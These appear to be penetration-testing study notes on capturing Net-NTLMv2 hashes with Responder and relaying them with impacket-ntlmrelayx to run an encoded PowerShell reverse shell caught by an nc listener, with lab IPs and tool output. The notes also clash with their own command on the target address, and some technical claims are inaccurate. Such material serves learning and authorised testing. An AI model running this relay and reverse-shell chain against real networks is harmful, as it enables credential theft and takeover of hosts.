New Technology Network Manager v2 is, you guessed it, the updated (and more widely used) version of NTLM. It is stored as HMAC-MD5 hash in SAM.
NTLMv2's challenge is a timestamp rather than a randomly generated number (NTLM), the timestamp is hashed with the users password and is sent as the response.
Cracking Net-NTLMv2
Responder
Responder includes a built-in SMB server that handles the authentication process for us and prints all captured Net-NTLMv2 hashes.
Start Responder
kali@kali:~$ ip a
...
3: tap0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
link/ether 42:11:48:1b:55:18 brd ff:ff:ff:ff:ff:ff
inet 192.168.119.2/24 scope global tap0
valid_lft forever preferred_lft forever
inet6 fe80::4011:48ff:fe1b:5518/64 scope link
valid_lft forever preferred_lft forever
kali@kali:~$ sudo responder -I tap0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.1.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
...
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
...
[+] Listening for events...
Request Access to Non-Existent Share
We want to request access to a share that we don't have access to in order to query the authentication protocol. Note: The IP we're querying is the IP of our Kali machine!
C:\Windows\system32>dir \\192.168.119.2\test
dir \\192.168.119.2\test
Access is denied.
Sometimes we obtain a Net-NTLMv2 hash but cant crack it. If the hash we obtained is from a local administrator, we can use it to authenticate over SMB like we do with psexec or wmiexec.
IMPORTANT: SMB Signing must be disabled to perform a relay attack!
NTLM_relayx - Impacket_
We can use NTLMrelayx from impacket to relay the hash over SMB.
kali@kali:~$ impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..."
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
...
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
--no-http-server disables the use of HTTP since we'll be using SMB manually.
192.168.50.512 is the target. (The box we're trying to get access to)
powershell -enc JABjAGwAaQBl.. is the command to execute once authenticated. (Reverse shell)
Start Listener
We will start a listener on our Attack host to catch the incoming response shell.
kali@kali$ nc -nvlp 8080
Request Access to Non-Existent Share
Like we do with Responder, we will query our Attack host for a share to catch the Hash.
C:\Windows\system32>dir \\192.168.119.2\test
Access is denied.
Check Back on the NC Listener and you should have a shell! (Assuming your powershell command works)
NOTE: Here are some resources for building a powershell command to be executed once the Net-NTLMv2 hash is relayed. (By Impacket)
AGAIN FOR RELAYING TO WORK WE MUST HAVE LOCAL ADMIN!
